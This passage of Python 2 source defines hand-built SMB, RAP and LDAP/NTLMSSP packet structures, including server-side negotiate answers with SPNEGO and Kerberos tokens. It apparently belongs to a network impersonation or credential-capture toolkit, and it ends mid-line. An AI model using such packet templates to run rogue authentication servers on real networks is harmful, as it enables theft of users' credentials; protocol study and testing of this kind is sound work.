 736 |     def calculate(self):
 737 | 
 738 |         ###### Convert strings to Unicode first
 739 |         self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
 740 |         self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
 741 |         self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
 742 |         self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
 743 |         self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
 744 |         self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
 745 | 
 746 |         ###### Workstation Offset
 747 |         CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
 748 |         ###### AvPairs Offset
 749 |         CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
 750 |         ###### LDAP Packet Len
 751 |         CalculatePacketLen = str(self.fields["MessageIDASNID"])+str(self.fields["MessageIDASNLen"])+str(self.fields["MessageIDASNStr"])+str(self.fields["OpHeadASNID"])+str(self.fields["OpHeadASNIDLenOfLen"])+str(self.fields["OpHeadASNIDLen"])+str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
 752 |         OperationPacketLen = str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
 753 |         NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
 754 | 
 755 |         ##### LDAP Len Calculation:
 756 |         self.fields["ParserHeadASNLen"] = struct.pack(">i", len(CalculatePacketLen))
 757 |         self.fields["OpHeadASNIDLen"] = struct.pack(">i", len(OperationPacketLen))
 758 |         self.fields["SequenceHeaderLen"] = struct.pack(">B", len(NTLMMessageLen))
 759 |         ##### Workstation Offset Calculation:
 760 |         self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
 761 |         self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
 762 |         self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
 763 |         ##### IvPairs Offset Calculation:
 764 |         self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
 765 |         self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
 766 |         self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
 767 |         ##### IvPair Calculation:
 768 |         self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
 769 |         self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
 770 |         self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
 771 |         self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
 772 |         self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
 773 | 
 774 | ##### SMB Packets #####
 775 | class SMBHeader(Packet):
 776 |     fields = OrderedDict([
 777 |         ("proto", "\xff\x53\x4d\x42"),
 778 |         ("cmd", "\x72"),
 779 |         ("errorcode", "\x00\x00\x00\x00"),
 780 |         ("flag1", "\x00"),
 781 |         ("flag2", "\x00\x00"),
 782 |         ("pidhigh", "\x00\x00"),
 783 |         ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
 784 |         ("reserved", "\x00\x00"),
 785 |         ("tid", "\x00\x00"),
 786 |         ("pid", "\x00\x00"),
 787 |         ("uid", "\x00\x00"),
 788 |         ("mid", "\x00\x00"),
 789 |     ])
 790 | 
 791 | class SMBNego(Packet):
 792 |     fields = OrderedDict([
 793 |         ("wordcount", "\x00"),
 794 |         ("bcc", "\x62\x00"),
 795 |         ("data", "")
 796 |     ])
 797 | 
 798 |     def calculate(self):
 799 |         self.fields["bcc"] = struct.pack("<h",len(str(self.fields["data"])))
 800 | 
 801 | class SMBNegoData(Packet):
 802 |     fields = OrderedDict([
 803 |         ("wordcount", "\x00"),
 804 |         ("bcc", "\x54\x00"),
 805 |         ("separator1","\x02" ),
 806 |         ("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
 807 |         ("separator2","\x02"),
 808 |         ("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
 809 |     ])
 810 | 
 811 |     def calculate(self):
 812 |         CalculateBCC  = str(self.fields["separator1"])+str(self.fields["dialect1"])
 813 |         CalculateBCC += str(self.fields["separator2"])+str(self.fields["dialect2"])
 814 |         self.fields["bcc"] = struct.pack("<h", len(CalculateBCC))
 815 | 
 816 | class SMBSessionData(Packet):
 817 |     fields = OrderedDict([
 818 |         ("wordcount", "\x0a"),
 819 |         ("AndXCommand", "\xff"),
 820 |         ("reserved","\x00"),
 821 |         ("andxoffset", "\x00\x00"),
 822 |         ("maxbuff","\xff\xff"),
 823 |         ("maxmpx", "\x02\x00"),
 824 |         ("vcnum","\x01\x00"),
 825 |         ("sessionkey", "\x00\x00\x00\x00"),
 826 |         ("PasswordLen","\x18\x00"),
 827 |         ("reserved2","\x00\x00\x00\x00"),
 828 |         ("bcc","\x3b\x00"),
 829 |         ("AccountPassword",""),
 830 |         ("AccountName",""),
 831 |         ("AccountNameTerminator","\x00"),
 832 |         ("PrimaryDomain","WORKGROUP"),
 833 |         ("PrimaryDomainTerminator","\x00"),
 834 |         ("NativeOs","Unix"),
 835 |         ("NativeOsTerminator","\x00"),
 836 |         ("NativeLanman","Samba"),
 837 |         ("NativeLanmanTerminator","\x00"),
 838 | 
 839 |     ])
 840 |     def calculate(self):
 841 |         CompleteBCC = str(self.fields["AccountPassword"])+str(self.fields["AccountName"])+str(self.fields["AccountNameTerminator"])+str(self.fields["PrimaryDomain"])+str(self.fields["PrimaryDomainTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLanman"])+str(self.fields["NativeLanmanTerminator"])
 842 |         self.fields["bcc"] = struct.pack("<h", len(CompleteBCC))
 843 |         self.fields["PasswordLen"] = struct.pack("<h", len(str(self.fields["AccountPassword"])))
 844 | 
 845 | class SMBNegoFingerData(Packet):
 846 |     fields = OrderedDict([
 847 |         ("separator1","\x02" ),
 848 |         ("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
 849 |         ("separator2","\x02"),
 850 |         ("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
 851 |         ("separator3","\x02"),
 852 |         ("dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
 853 |         ("separator4","\x02"),
 854 |         ("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
 855 |         ("separator5","\x02"),
 856 |         ("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
 857 |         ("separator6","\x02"),
 858 |         ("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
 859 |     ])
 860 | 
 861 | class SMBSessionFingerData(Packet):
 862 |     fields = OrderedDict([
 863 |         ("wordcount", "\x0c"),
 864 |         ("AndXCommand", "\xff"),
 865 |         ("reserved","\x00" ),
 866 |         ("andxoffset", "\x00\x00"),
 867 |         ("maxbuff","\x04\x11"),
 868 |         ("maxmpx", "\x32\x00"),
 869 |         ("vcnum","\x00\x00"),
 870 |         ("sessionkey", "\x00\x00\x00\x00"),
 871 |         ("securitybloblength","\x4a\x00"),
 872 |         ("reserved2","\x00\x00\x00\x00"),
 873 |         ("capabilities", "\xd4\x00\x00\xa0"),
 874 |         ("bcc1",""),
 875 |         ("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
 876 | 
 877 |     ])
 878 |     def calculate(self):
 879 |         self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
 880 | 
 881 | class SMBTreeConnectData(Packet):
 882 |     fields = OrderedDict([
 883 |         ("Wordcount", "\x04"),
 884 |         ("AndXCommand", "\xff"),
 885 |         ("Reserved","\x00" ),
 886 |         ("Andxoffset", "\x00\x00"),
 887 |         ("Flags","\x08\x00"),
 888 |         ("PasswdLen", "\x01\x00"),
 889 |         ("Bcc","\x1b\x00"),
 890 |         ("Passwd", "\x00"),
 891 |         ("Path",""),
 892 |         ("PathTerminator","\x00"),
 893 |         ("Service","?????"),
 894 |         ("Terminator", "\x00"),
 895 | 
 896 |     ])
 897 |     def calculate(self):
 898 |         self.fields["PasswdLen"] = struct.pack("<h", len(str(self.fields["Passwd"])))[:2]
 899 |         BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
 900 |         self.fields["Bcc"] = struct.pack("<h", len(BccComplete))
 901 | 
 902 | class RAPNetServerEnum3Data(Packet):
 903 |     fields = OrderedDict([
 904 |         ("Command", "\xd7\x00"),
 905 |         ("ParamDescriptor", "WrLehDzz"),
 906 |         ("ParamDescriptorTerminator", "\x00"),
 907 |         ("ReturnDescriptor","B16BBDz"),
 908 |         ("ReturnDescriptorTerminator", "\x00"),
 909 |         ("DetailLevel", "\x01\x00"),
 910 |         ("RecvBuff","\xff\xff"),
 911 |         ("ServerType", "\x00\x00\x00\x80"),
 912 |         ("TargetDomain","SMB"),
 913 |         ("RapTerminator","\x00"),
 914 |         ("TargetName","ABCD"),
 915 |         ("RapTerminator2","\x00"),
 916 |     ])
 917 | 
 918 | class SMBTransRAPData(Packet):
 919 |     fields = OrderedDict([
 920 |         ("Wordcount", "\x0e"),
 921 |         ("TotalParamCount", "\x24\x00"),
 922 |         ("TotalDataCount","\x00\x00" ),
 923 |         ("MaxParamCount", "\x08\x00"),
 924 |         ("MaxDataCount","\xff\xff"),
 925 |         ("MaxSetupCount", "\x00"),
 926 |         ("Reserved","\x00\x00"),
 927 |         ("Flags", "\x00"),
 928 |         ("Timeout","\x00\x00\x00\x00"),
 929 |         ("Reserved1","\x00\x00"),
 930 |         ("ParamCount","\x24\x00"),
 931 |         ("ParamOffset", "\x5a\x00"),
 932 |         ("DataCount", "\x00\x00"),
 933 |         ("DataOffset", "\x7e\x00"),
 934 |         ("SetupCount", "\x00"),
 935 |         ("Reserved2", "\x00"),
 936 |         ("Bcc", "\x3f\x00"),
 937 |         ("Terminator", "\x00"),
 938 |         ("PipeName", "\\PIPE\\LANMAN"),
 939 |         ("PipeTerminator","\x00\x00"),
 940 |         ("Data", ""),
 941 | 
 942 |     ])
 943 |     def calculate(self):
 944 |         #Padding
 945 |         if len(str(self.fields["Data"]))%2==0:
 946 |            self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
 947 |         else:
 948 |            self.fields["PipeTerminator"] = "\x00\x00\x00"
 949 |         ##Convert Path to Unicode first before any Len calc.
 950 |         self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
 951 |         ##Data Len
 952 |         self.fields["TotalParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
 953 |         self.fields["ParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
 954 |         ##Packet len
 955 |         FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
 956 |         self.fields["ParamOffset"] = struct.pack("<i", len(FindRAPOffset)+32)[:2]
 957 |         ##Bcc Buff Len
 958 |         BccComplete    = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
 959 |         self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
 960 | 
 961 | class SMBNegoAnsLM(Packet):
 962 |     fields = OrderedDict([
 963 |         ("Wordcount",    "\x11"),
 964 |         ("Dialect",      ""),
 965 |         ("Securitymode", "\x03"),
 966 |         ("MaxMpx",       "\x32\x00"),
 967 |         ("MaxVc",        "\x01\x00"),
 968 |         ("Maxbuffsize",  "\x04\x41\x00\x00"),
 969 |         ("Maxrawbuff",   "\x00\x00\x01\x00"),
 970 |         ("Sessionkey",   "\x00\x00\x00\x00"),
 971 |         ("Capabilities", "\xfc\x3e\x01\x00"),
 972 |         ("Systemtime",   "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
 973 |         ("Srvtimezone",  "\x2c\x01"),
 974 |         ("Keylength",    "\x08"),
 975 |         ("Bcc",          "\x10\x00"),
 976 |         ("Key",          ""),
 977 |         ("Domain",       "SMB"),
 978 |         ("DomainNull",   "\x00\x00"),
 979 |         ("Server",       "SMB-TOOLKIT"),
 980 |         ("ServerNull",   "\x00\x00"),
 981 |     ])
 982 | 
 983 |     def calculate(self):
 984 |         self.fields["Domain"] = self.fields["Domain"].encode('utf-16le')
 985 |         self.fields["Server"] = self.fields["Server"].encode('utf-16le')
 986 |         CompleteBCCLen =  str(self.fields["Key"])+str(self.fields["Domain"])+str(self.fields["DomainNull"])+str(self.fields["Server"])+str(self.fields["ServerNull"])
 987 |         self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
 988 |         self.fields["Keylength"] = struct.pack("<h",len(self.fields["Key"]))[0]
 989 | 
 990 | class SMBNegoAns(Packet):
 991 |     fields = OrderedDict([
 992 |         ("Wordcount",    "\x11"),
 993 |         ("Dialect",      ""),
 994 |         ("Securitymode", "\x03"),
 995 |         ("MaxMpx",       "\x32\x00"),
 996 |         ("MaxVc",        "\x01\x00"),
 997 |         ("MaxBuffSize",  "\x04\x41\x00\x00"),
 998 |         ("MaxRawBuff",   "\x00\x00\x01\x00"),
 999 |         ("SessionKey",   "\x00\x00\x00\x00"),
1000 |         ("Capabilities", "\xfd\xf3\x01\x80"),
1001 |         ("SystemTime",   "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
1002 |         ("SrvTimeZone",  "\xf0\x00"),
1003 |         ("KeyLen",    "\x00"),
1004 |         ("Bcc",          "\x57\x00"),
1005 |         ("Guid",         "\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"),
1006 |         ("InitContextTokenASNId",     "\x60"),
1007 |         ("InitContextTokenASNLen",    "\x5b"),
1008 |         ("ThisMechASNId",             "\x06"),
1009 |         ("ThisMechASNLen",            "\x06"),
1010 |         ("ThisMechASNStr",            "\x2b\x06\x01\x05\x05\x02"),
1011 |         ("SpNegoTokenASNId",          "\xA0"),
1012 |         ("SpNegoTokenASNLen",         "\x51"),
1013 |         ("NegTokenASNId",             "\x30"),
1014 |         ("NegTokenASNLen",            "\x4f"),
1015 |         ("NegTokenTag0ASNId",         "\xA0"),
1016 |         ("NegTokenTag0ASNLen",        "\x30"),
1017 |         ("NegThisMechASNId",          "\x30"),
1018 |         ("NegThisMechASNLen",         "\x2e"),
1019 |         ("NegThisMech4ASNId",         "\x06"),
1020 |         ("NegThisMech4ASNLen",        "\x09"),
1021 |         ("NegThisMech4ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
1022 |         ("NegTokenTag3ASNId",         "\xA3"),
1023 |         ("NegTokenTag3ASNLen",        "\x1b"),
1024 |         ("NegHintASNId",              "\x30"),
1025 |         ("NegHintASNLen",             "\x19"),
1026 |         ("NegHintTag0ASNId",          "\xa0"),
1027 |         ("NegHintTag0ASNLen",         "\x17"),
1028 |         ("NegHintFinalASNId",         "\x1b"),
1029 |         ("NegHintFinalASNLen",        "\x15"),
1030 |         ("NegHintFinalASNStr",        "server2008$@SMB.LOCAL"),
1031 |     ])
1032 | 
1033 |     def calculate(self):
1034 |         CompleteBCCLen1 =  str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
1035 |         AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
1036 |         AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
1037 |         MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
1038 |         Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
1039 | 
1040 |         self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen1))
1041 |         self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(AsnLenStart))
1042 |         self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
1043 |         self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
1044 |         self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
1045 |         self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
1046 |         self.fields["NegThisMechASNLen"] = struct.pack("<B", len(MechTypeLen)-2)
1047 |         self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
1048 |         self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
1049 |         self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
1050 |         self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4)
1051 |         self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
1052 | 
1053 | class SMBNegoKerbAns(Packet):
1054 |     fields = OrderedDict([
1055 |         ("Wordcount",                "\x11"),
1056 |         ("Dialect",                  ""),
1057 |         ("Securitymode",             "\x03"),
1058 |         ("MaxMpx",                   "\x32\x00"),
1059 |         ("MaxVc",                    "\x01\x00"),
1060 |         ("MaxBuffSize",              "\x04\x41\x00\x00"),
1061 |         ("MaxRawBuff",               "\x00\x00\x01\x00"),
1062 |         ("SessionKey",               "\x00\x00\x00\x00"),
1063 |         ("Capabilities",             "\xfd\xf3\x01\x80"),
1064 |         ("SystemTime",               "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
1065 |         ("SrvTimeZone",               "\xf0\x00"),
1066 |         ("KeyLen",                    "\x00"),
1067 |         ("Bcc",                       "\x57\x00"),
1068 |         ("Guid",                      "\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"),
1069 |         ("InitContextTokenASNId",     "\x60"),
1070 |         ("InitContextTokenASNLen",    "\x5b"),
1071 |         ("ThisMechASNId",             "\x06"),
1072 |         ("ThisMechASNLen",            "\x06"),
1073 |         ("ThisMechASNStr",            "\x2b\x06\x01\x05\x05\x02"),
1074 |         ("SpNegoTokenASNId",          "\xA0"),
1075 |         ("SpNegoTokenASNLen",         "\x51"),
1076 |         ("NegTokenASNId",             "\x30"),
1077 |         ("NegTokenASNLen",            "\x4f"),
1078 |         ("NegTokenTag0ASNId",         "\xA0"),
1079 |         ("NegTokenTag0ASNLen",        "\x30"),
1080 |         ("NegThisMechASNId",          "\x30"),
1081 |         ("NegThisMechASNLen",         "\x2e"),
1082 |         ("NegThisMech1ASNId",         "\x06"),
1083 |         ("NegThisMech1ASNLen",        "\x09"),
1084 |         ("NegThisMech1ASNStr",        "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
1085 |         ("NegThisMech2ASNId",         "\x06"),
1086 |         ("NegThisMech2ASNLen",        "\x09"),
1087 |         ("NegThisMech2ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
1088 |         ("NegThisMech3ASNId",         "\x06"),
1089 |         ("NegThisMech3ASNLen",        "\x0a"),
1090 |         ("NegThisMech3ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
1091 |         ("NegThisMech4ASNId",         "\x06"),
1092 |         ("NegThisMech4ASNLen",        "\x09"),
1093 |         ("NegThisMech4ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
1094 |         ("NegTokenTag3ASNId",         "\xA3"),
1095 |         ("NegTokenTag3ASNLen",        "\x1b"),
1096 |         ("NegHintASNId",              "\x30"),
1097 |         ("NegHintASNLen",             "\x19"),
1098 |         ("NegHintTag0ASNId",          "\xa0"),
1099 |         ("NegHintTag0ASNLen",         "\x17"),
1100 |         ("NegHintFinalASNId",         "\x1b"),
1101 |         ("NegHintFinalASNLen",        "\x15"),
1102 |         ("NegHintFinalASNStr",        "server2008$@SMB.LOCAL"),
1103 |     ])
1104 | 
1105 |     def calculate(self):
1106 |         CompleteBCCLen1 =  str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+